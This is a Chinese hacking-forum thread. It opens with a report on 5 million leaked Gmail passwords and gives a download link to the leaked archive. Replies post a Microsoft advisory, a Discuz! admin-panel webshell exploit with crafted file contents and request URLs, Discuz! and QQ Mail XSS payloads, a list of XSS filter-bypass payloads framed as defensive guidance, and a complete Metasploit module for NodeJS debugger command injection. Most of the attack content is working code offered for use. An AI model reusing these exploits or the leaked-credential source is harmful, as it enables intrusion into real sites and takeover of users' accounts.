最近看过此主题的会员

返回列表 发帖

罗斯论坛曝Gmail五百万密码泄露

一份名为“google_5000000.7z”的压缩文件被泄露在一家俄罗斯比特币论坛上,文件包含了五百万的gmail用户的账号和密码。



据博客称,60%的账号和密码都是可用的,因此3百万gmail账号任然存在着风险。



将近一半的账号和密码是正确的,有些账号因为"可疑的登陆"已经被Google停用,这说明,在此之前,这些gmail账号已经不安全。



其中有一部分是去年adobe密码而泄露的

为了你的gmail账户安全,最好的方法就是开启两步验证,并且在你的智能机中下载Google Authentication。

关于泄露的账号和密码

google_5000000.7z下载:http://cloud.draghetti.it/ownclo ... 6d6665ae42c344518ab (仅含账号)

如何查询我的账号和密码是否泄露

gamil查询是否泄露:https://isleaked.com/en

[参考信息来源:https://icloud.net/blog/82/5-million-gmail-passwords-leaked/]
附件: 您需要登录才可以下载或查看附件。没有帐号?进入圈子

 

您可能还想看的主题:

整理网站0day

开放免费的DNS

新主站板块更新!Google_Hack_Database

HDhacker内部全套VIP教程 共3.5GB[115]

PHP爆绝对路径方法收集

Google Chrome跨站脚本过滤器绕过漏洞

谷歌宣布将关闭谷歌视频和Tags服务

windows 7 32位华硕原生恢复光盘

黑客日薪一万二 IT企业受苦难

Google质疑IE9安全测试

1

评分人数

    • webmaster: 精品文章威望 + 10 金钱 + 10 金 贡献 + 5 非安全基金 + 2 基金
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:0x01发表,本帖发表者0x01符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者0x01和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

MS07-031:Windows Schannel 中远程执行代码漏洞
发布日期: 六月 12, 2007<BR>版本: 1.0
摘要:
此关键安全更新解决了 Windows 中的安全通道 (Schannel) 安全数据包中秘密报告的漏洞。 Schannel 安全数据包实现安全套接字层 (SSL) 和传输层安全 (TLS) Internet 标准身份验证协议。 如果用户使用 Internet Web 浏览器查看特制网页或使用利用 SSL/TLS 的应用程序,则此漏洞可能允许远程执行代码。 但是,利用此漏洞的尝试最有可能导致 Internet Web 浏览器或应用程序退出。 重新启动系统之前,系统不能使用 SSL 或 TLS 连接到网站或资源。
这是 Windows XP 的受支持版本的关键更新、Windows 2003 版本的重要更新以及 Windows 2000 版本的中等更新。
此安全更新通过修改客户端分析服务器发送的服务器密钥交换数据的方式来解决该漏洞。
建议。 Microsoft 建议用户立即应用此更新。
更新替代。 此安全更新不替代以前的安全更新。
受影响的软件<BR>操作系统 最大安全影响 综合严重程度等级 <BR>Windows 2000 Service Pack 4<BR>&nbsp;拒绝服务<BR>&nbsp;中等<BR>&nbsp;<BR>Windows XP Service Pack 2<BR>&nbsp;远程执行代码<BR>&nbsp;严重<BR>&nbsp;<BR>Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2<BR>&nbsp;远程执行代码<BR>&nbsp;严重<BR>&nbsp;<BR>Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2<BR>&nbsp;拒绝服务<BR>&nbsp;重要<BR>&nbsp;<BR>Windows Server 2003 x64 Edition 和 Windows Server 2003 x64 Edition Service Pack 2<BR>&nbsp;拒绝服务<BR>&nbsp;重要<BR>&nbsp;<BR>Windows Server 2003 SP1(用于基于 Itanium 的系统)以及 Windows Server 2003 SP2(用于基于 Itanium 的系统)<BR>&nbsp;拒绝服务<BR>&nbsp;重要<BR>&nbsp;
不受影响的软件
软件 <BR>Windows Vista<BR>&nbsp;<BR>Windows Vista x64 Edition<BR>&nbsp;
微软的安全公告:
<BR>http://www.microsoft.com/china/technet/security/bulletin/MS07-031.mspx
(以上链接均连到第三方网站)<BR>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Discuz!后台获取webshell漏洞
<TABLE class="tab-content table-break" cellSpacing=0 cellPadding=0>



Discuz! admindatabase.inc.php get-webshell bug


由于Discuz!的admindatabase.inc.php里action=importzip解压zip文件时,导致可以得到webshell. 一 分析 在文件admindatabase.inc.php里代码: ..... elseif($operation == 'importzip') { require_once DISCUZ_ROOT.'admin/zip.func.php'; $unzip = new SimpleUnzip(); $unzip->ReadFile($datafile_server); if($unzip->Count() == 0 || $unzip->GetError(0) != 0 || !preg_match("/.sql$/i", $importfile = $unzip->GetName(0))) { cpmsg('database_import_file_illegal', '', 'error'); } $identify = explode(',', base64_decode(preg_replace("/^# Identify:s*(w+).*/s", "\1", substr($unzip->GetData(0), 0, 256)))); $confirm = !empty($confirm) ? 1 : 0; if(!$confirm &amp;&amp; $identify[1] != $version) { cpmsg('database_import_confirm', 'admincp.php?action=database&amp;operation=importzip&amp;datafile_server=$datafile_server&amp;importsubmit=yes&amp;confirm=yes', 'form'); } $sqlfilecount = 0; foreach($unzip->Entries as $entry) { if(preg_match("/.sql$/i", $entry->Name)) { $fp = fopen('./forumdata/'.$backupdir.'/'.$entry->Name, 'w'); fwrite($fp, $entry->Data); fclose($fp); $sqlfilecount++; } } ...... 注意2点 1. preg_match("/.sql$/i", $importfile = $unzip->GetName(0)) 可以利用apache的特性如081127_k4pFUs3C-1.php.sql这样类似的文件. 2. $identify = explode(',', base64_decode(preg_replace("/^# Identify:s*(w+).*/s", "\1", substr($unzip->GetData(0), 0, 256)))); 所以要注意文件格式:[可以先备用下然后修改打包为zip] # Identify: MTIyNzc1NzEyNSw2LjEuMCxkaXNjdXosbXVsdGl2b2wsMQ== # <?phpinfo();?> # <?exit();?> # Discuz! Multi-Volume Data Dump Vol.1 # Version: Discuz! 6.1.0 # Time: 2008-11-27 11:38 # Type: discuz # Table Prefix: cdb_ 二 利用 提交: <6.0 :admincp.php?action=importzip&amp;datafile_server=./附件路径/附件名.zip&amp;importsubmit=yes =6.1 :admincp.php?action=database&amp;operation=importzip&amp;datafile_server=./附件路径/附件名称.zip&amp;importsubmit=yes&amp;frames=yes 三 补丁[fix] 缺 </TABLE>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Discuz!通用版本触发事件xss bug
触发事件xss 利用机会不高
由于Discuz!的1_modcp_editpost.tpl.php里$orig['message']未过滤,导致一个XSS漏洞. 一 分析 在文件1_modcp_editpost.tpl.php里代码: .....<? } elseif($action == 'editmessage') { ?><textarea type="text" id="message_<?=$pid?>" name="message_<?=$pid?>" style="width: 80%; height: 200px; overflow: visible" ondblclick="doane(event)"><?=$orig['message']?></textarea><p style="margin: 5px; text-align: center;"><button type="button" value="true" class="submit" onclick="submitmessage('<?=$pid?>');this.disabled=true">提交</button>  <button type="button" class="submit" onclick="ajaxget('modcp.php?action=editmessage&amp;pid=<?=$pid?>&amp;tid=<?=$tid?>&amp;editmessagesubmit=yes&amp;inajax=1&amp;do=notupdate', 'postmessage_<?=$pid?>')">取消</button></p><script type="text/javascript">......<?=$orig['message']?>没有过滤导致xss. 进入以上的代码的有2处: 1. 1_viewthread.tpl.php里: 00278: <td class="postcontent" <? if($forum['ismoderator'] &amp;&amp; ($thread['digest'] >= 0 || !$post['first'])) { ?> ondblclick="ajaxget('modcp.php?action=editmessage&amp;pid=<?=$post['pid']?>&amp;tid=<?=$post['tid']?>', 'postmessage_<?=$post['pid']?>')"<? } ?>>00279: <div class="postinfo">通过ondblclick事件触发ajaxget去访问. 2. Beijing2008forumdisplay.htm 00224: </td>00225: <th class="$thread[folder]" {if $forum['ismoderator']} ondblclick="ajaxget('modcp.php?action=editsubject&amp;tid=$thread[tid]', 'thread_$thread[tid]', 'specialposts');doane(event);"{/if}>00226: <label>同上下面的利用是用的1_viewthread.tpl.php里的方法. 二 利用 步骤: 1.发表新贴 ->帖子内容:<script>alert('www.sitedir.com.cn')</script> 2.对帖子有管理权限的用户"双击"讨论帖进入便捷编辑模式,将触发XSS. 三 补丁[fix] 缺


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

QQ邮箱跨站又一漏洞
QQ邮箱跨站又一漏洞
问题位置:文件中转站
利用代码:【构造附件】D:langhack<iframe src=http:&amp;#47;&amp;#47;www.sitedir.com.cn%20width=800%20height=800><%2Fiframe>XXS.rar
利用过程,看操作 OK
1.rar


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

富文本编辑器的跨站脚本问题参考
富文本编辑器是一个开放式的HTML内容编辑环境,必须实现文字样式、链接、图片等功能的HTML,所以用户POST的内容必须含有HTML标签,但是任由用户输入各类HTML标签,会造成一些潜在的恶意脚本攻击,借这类情况正好分析出现XSS的情况,主要针对IE浏览器.
[/quote]
[quote]一.首先是微软建议我们可能造成恶意脚本攻击的标签.
类似如下的
tag:
appletbase basefontbgsoundblinkbodyembedframeframesethead html ilayeriframelayer link meta objectstyletitlescript
-----------------------------------类似这类
<tag
必须删除.
二.针对HTML属性值的协议攻击.
tag:
dynsrc=href=lowsrc=src=background=value=action=bgsound=
黑客可能利用如下协议:
脚本伪协议
vbscript:javascript:
文件类协议
ms-its:mhtml:data:
第三方协议
firefoxurl:mocha:livescript:类似这类
<xxx tag=xxx:
如:
<IMG LOWSRC="javascript:alert('XSS')">
必须判断属性的用的啥协议,给个http:就好了.
三.针对普通HTML属性值的编码,黑客可利用HTML特性将属性值做编码绕过过滤.
&amp;# 加 ASCII格式
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
---------------------------------类似这类
<xxx tag=&amp;#
必须判断属性的值&amp;转换成 &amp;
四.css样式style属性问题.
<XSS STYLE="xss:expression(alert('XSS'))"><XSS STYLE="behavior: url(xss.htc);">
style属性可以和任意字符的标签结合,因此不是<tag>的问题,必须对style属性值做过滤.
behavior需指定域内也就是绝对路径的HTC文件,危害不大.
expression可以构造不同的全角字符和注释符来扰乱过滤规则.
如:
<XSS STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:exprEssion(alert('XSS'))">
<div style="{ left:expression( alert('xss') ) }">
---------------------------------类似这类
<xxx style="xxxxxxxxxx"
必须判断style属性的值, :( ~这里正则超级难写,实在不过滤的话,列个白名单,只允许某些值.
五.css样式style属性其他问题.
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="list-style-image: url("javascript:alert('XSS')">
<DIV style="-moz-binding:url(http://xxx.com/mozxss.xml#xss)">
---------------------------------类似这类
<xxx style="xxxxxxx:url(xxxxx)"
还是判断协议头之类吧.
六.针对普通style属性值的编码,黑客可利用HTML特性将属性值做编码绕过过滤.
转义字符 加 16进制格式
<DIV STYLE="background-image:07507206C028'06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029'029">类似这类
<xxx style="xxxxxxx:0xx0xx"
搞个正则过滤+数字的字符串.
七.针对正常标签组合事件触发脚本的问题.
黑客可以利用类似事件触发脚本:
onloadonerroronmousemoveonmouseoutonmouseoveronmouseuponmouseenteronmouseleaveonmousewheelonscroll....................................
类似这类
<xxx on*=
如:
<img src=xx onerror=alert(/xss/)>
情况都给过滤吧.
八.第三方媒体文件,崭只针对FLASH与WEB交互的问题.
FLASH的Action Script比较危险,可以和用户做交互式的访问.
可以设置Flash对象的AllowScriptAccess参数为never来解决问题。
AllowScriptAccess 参数有三个可选值,always、never 和 sameDomain
never 禁止运行对外脚本always 可以运行对外脚本sameDomain 只允许同一域下的Flash运行对外脚本
如<embed src="demo.swf" quality="high"pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="550" height="400" AllowScriptAccess="never"></embed>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

NodeJS Debugger Command Injection Exploit
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  MESSAGE_HEADER_TEMPLATE   = "Content-Length: %{length}

"

  def initialize(info={})
    super(update_info(info,
      'Name'           => "NodeJS Debugger Command Injection",
      'Description'    => %q{
        This module uses the "evaluate" request type of the NodeJS V8
        debugger protocol (version 1) to evaluate arbitrary JS and
         call out to other system commands. The port (default 5858) is
        not exposed non-locally in default configurations, but may be
        exposed either intentionally or via misconfiguration.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Patrick Thomas <pst[at]coffeetocode.net>' ],
      'References'     =>
        [
          [ 'URL', 'https://github.com/buggerjs/bugger-v8-client/blob/master/PROTOCOL.md' ],
          [ 'URL', 'https://github.com/nodejs/node/pull/8106' ]
        ],
      'Targets'        =>
        [
          ['NodeJS', { 'Platform' => 'nodejs', 'Arch' => 'nodejs' } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Aug 15 2016",
      'DefaultTarget'  => 0)
    )

    register_options(
      [
        Opt::RPORT(5858)
      ])
  end

  def make_eval_message
    msg_body = { seq: 1,
                 type: 'request',
                 command: 'evaluate',
                 arguments: { expression: payload.encoded,
                              global: true,
                              maxStringLength:-1
                            }
                }.to_json
    msg_header = MESSAGE_HEADER_TEMPLATE % {:length => msg_body.length}
    msg_header + msg_body
  end

  def check
    connect
    res = sock.get_once
    disconnect

    if res.include? "V8-Version" and res.include? "Protocol-Version: 1"
      vprint_status("Got debugger handshake:
#{res}")
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Unknown
  end

  def exploit
    connect
    # must consume incoming handshake before sending payload
    buf = sock.get_once
    msg = make_eval_message
    print_status("Sending #{msg.length} byte payload...")
    vprint_status("#{msg}")
    sock.put(msg)
    buf = sock.get_once

    if buf.include? '"command":"evaluate","success":true'
      print_status("Got success response")
    elsif buf.include? '"command":"evaluate","success":false'
      print_error("Got failure response: #{buf}")
    else
      print_error("Got unexpected response: #{buf}")
    end
  end

end



















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

经过你的指点 我还是没找到在哪 ~~~


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表